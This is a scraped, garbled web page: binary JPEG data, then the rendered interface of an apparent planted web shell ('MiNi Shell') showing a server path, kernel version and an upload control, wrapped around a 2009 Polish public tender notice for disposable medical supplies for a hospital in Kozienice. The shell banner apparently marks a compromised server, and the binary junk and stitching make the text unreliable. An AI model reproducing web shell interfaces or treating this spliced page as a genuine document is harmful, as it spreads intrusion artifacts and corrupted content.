JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/35677-N-2009.html

<p class="kh_header"><b>Kozienice: DOSTAWA  DROBNEGO SPRZĘTU JEDNORAZOWEGO UŻYTKU DLA SPZZOZ W KOZIENICACH.</b><br>
<b>Numer ogłoszenia: 35677 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , al. gen. Wł. Sikorskiego 10, 26-900 Kozienice, woj. mazowieckie, tel. 048 6148234, faks 048 6148139.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalkozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA  DROBNEGO SPRZĘTU JEDNORAZOWEGO UŻYTKU DLA SPZZOZ W KOZIENICACH..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa drobnego sprzętu jednorazowego użytku 
    dla SPZZOZ w Kozienicach.
2. Przedmiot zamówienia składa się z 14 niepodzielnych zadań. 
    Zadanie nr 1 -  Katetery do drenażu klatki piersiowej, dren do dróg żółciowych.
    Zadanie nr 2 -  Zestaw inhalacyjny i końcówki nosowe do inhalatora.
    Zadanie nr 3 -  Katetery do embolektomii i dren brzuszny.
    Zadanie nr 4 -  Elektrody EKG.
    Zadanie nr 5 -  Papiery do drukarek.
    Zadanie nr 6 -  Żarówki
    Zadanie nr 7 -  Elektrody silikonowe i podkłady do elektrod.
    Zadanie nr 8 -  Zgłębnik żołądkowy, zestaw do lewatywy, zatyczka do cewnika, 
                         cewnik moczowodowy, sonda. 
    Zadanie nr 9 -  Igła do znieczuleń, zestawy do znieczuleń.
    Zadanie nr 10 - Opaski do identyfikacji, pincety, baseny, kaczki.  
    Zadanie nr 11 - Cewniki DUFORR, cewnik FOLEYA, cewnik PEZZER, woreczki na 
                          mocz, zestaw łącznikowy, szczoteczka, jednorazowa szpatułka.
    Zadanie nr 12 - Cewniki do karmienia, cewniki do podawania tlenu, filtry 
                          oddechowe, rurki intubacyjne.
    Zadanie nr 13 - Zestaw do godzinowej zbiórki moczu, worek mikcyjny, dren, żel.
    Zadanie nr 14 - Zestaw trzykomorowy do drenażu opłucnej.
3. Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania 
    lub na wszystkie zadania
4. Zamawiający nie dopuszcza dzielenia zadania.
5. Dostawa przedmiotu zamówienia odbędzie się na koszt i ryzyko Wykonawcy.
6. Termin realizacji zamówienia: dostawy sukcesywnie w miarę potrzeb  
    Zamawiającego przez 24 miesiące od daty podpisania umowy.
7. Termin dostaw częściowych: 7 dni roboczych od dnia złożenia zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.13.21-6, 33.14.16.20-2, 33.14.16.42-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymogi art. 22 ust. 1 ustawy:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiadam niezbędną wiedzę i doświadczenie oraz dysponuję potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
- znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
2. Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy.
3. Wykonawca spełniający warunki określone w specyfikacji istotnych warunków zamówienia.  
4. Sposób dokonywania oceny spełnienia warunków:
- Zamawiający dokona oceny spełnienia warunków udziału, o których mowa w ust. 9 pkt 1 siwz  na podstawie analizy dokumentów i oświadczeń dołączonych do oferty zgodnie z ust. 10 siwz,
- z postępowania o udzielenie zamówienia będą wykluczeni wykonawcy stosownie do art. 24 ust. 1 i ust. 2 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Wykaz wykonywanych dostaw w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy zostały wykonane należycie - wypełniony formularz wg wzoru ustalonego Załącznikiem nr 4 do siwz. 
Wykonawca musi wykazać, iż posiada doświadczenie w realizacji przedmiotu zamówienia i wykonał z należytą starannością co najmniej jedną dostawę odpowiadającą rodzajem i wartością, stanowiącą przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia 
dokumentów potwierdzających, że dostawy te zostały wykonane należycie.
3. Zaświadczenie podmiotu uprawnionego do kontroli jakości, że dostarczone produkty będące przedmiotem dostawy odpowiadają określonym normom lub specyfikacją technicznym - dokumenty potwierdzające dopuszczenia wyrobu medycznego lub wyrobu niemedycznego (jeżeli dotyczy) do obrotu
na terytorium Rzeczpospolitej Polskiej zgodnie z obowiązującymi  przepisami ustawy o wyrobach medycznych lub ustawy o systemie oceny zgodności: deklaracji zgodności CE, certyfikat CE wystawiony przez jednostkę notyfikowaną - jeżeli dotyczy, wpisy lub zgłoszenia do rejestru wyrobów medycznych - jeżeli dotyczy.
Przedmiot zamówienia wprowadzony do obrotu i używania musi być oznaczony znakiem CE (jeżeli dotyczy).
4. Wykonawca może zamiast zaświadczenia, o którym mowa w ust. 10 pkt. 3, złożyć równoważne zaświadczenie wystawione przez podmiot mający siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.
5. W razie działania Wykonawcy poprzez pełnomocnika - dokument pełnomocnictwa zawierający umocowanie obejmujące swym zakresem dokonywanie wszelkich czynności w postępowaniu.
6. Szczegółowy opis oferowanego przedmiotu zamówienia z uwzględnieniem elementów: 
1)   Wypełniony formularz ofertowy - Załącznik nr 1 do siwz,
2)   Wypełniony przedmiot zamówienia - Załącznik nr 2 do siwz,
3)   Oświadczenie Wykonawcy - wypełniony formularz wg wzoru ustalonego  
      Załącznikiem nr 3 do siwz.
4)   Parafowany i wypełniony wzór umowy (parafowany i wypełniony w miarę 
      możliwości) - Załącznik nr 5 siwz,
5)   Ulotki informacyjne, instrukcje użycia, foldery itp. dla oferowanego przedmiotu 
      zamówienia w języku polskim.
7. Wykonawca zobowiązany  jest, na wezwanie Zamawiającego, do złożenia, w 
terminie 7 dni od daty otrzymania wezwania,  próbek zaoferowanego asortymentu w ilości wystarczającej do określenia jego zgodności z kryteriami określonymi w Załączniku nr 2 do siwz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Stałość cen - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpitalkozienice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej
ul. Al. Gen. Wł. Sikorskiego 10
26-900 Kozienice
telefon:/048/614-82-34 
faks:/048/614-81-39.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 11:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej
ul. Al. Gen. Wł. Sikorskiego 10
26-900 Kozienice
Kancelaria - parter budynku Szpitala.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Katetery do drenażu klatki piersiowej, dren do dróg żółciowych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 -  Katetery do drenażu klatki piersiowej, dren do dróg żółciowych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.42-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestaw inhalacyjny i końcówki nosowe do inhalatora..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 -  Zestaw inhalacyjny i końcówki nosowe do inhalatora..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Katetery do embolektomii i dren brzuszny..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 -  Katetery do embolektomii i dren brzuszny..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Elektrody EKG..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 -  Elektrody EKG..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Papiery do drukarek..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5 -  Papiery do drukarek..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Żarówki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6 -  Żarówki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Elektrody silikonowe i podkłady do elektrod..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7 -  Elektrody silikonowe i podkłady do elektrod..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zgłębnik żołądkowy, zestaw do lewatywy, zatyczka do cewnika, cewnik moczowodowy, sonda..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8 -  Zgłębnik żołądkowy, zestaw do lewatywy, zatyczka do cewnika, cewnik moczowodowy, sonda..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Igła do znieczuleń, zestawy do znieczuleń..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9 -  Igła do znieczuleń, zestawy do znieczuleń..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.21-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Opaski do identyfikacji, pincety, baseny, kaczki..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 10 - Opaski do identyfikacji, pincety, baseny, kaczki..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Cewniki DUFORR, cewnik FOLEYA, cewnik PEZZER, woreczki na mocz, zestaw łącznikowy, szczoteczka, jednorazowa szpatułka..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 11 - Cewniki DUFORR, cewnik FOLEYA, cewnik PEZZER, woreczki na mocz, zestaw łącznikowy, szczoteczka, jednorazowa szpatułka..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Cewniki do karmienia, cewniki do podawania tlenu, filtry oddechowe, rurki intubacyjne..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 12 - Cewniki do karmienia, cewniki do podawania tlenu, filtry oddechowe, rurki intubacyjne..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zestaw do godzinowej zbiórki moczu, worek mikcyjny, dren, żel..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 13 - Zestaw do godzinowej zbiórki moczu, worek mikcyjny, dren, żel..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zestaw trzykomorowy do drenażu opłucnej..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 14 - Zestaw trzykomorowy do drenażu opłucnej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Stałość cen - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com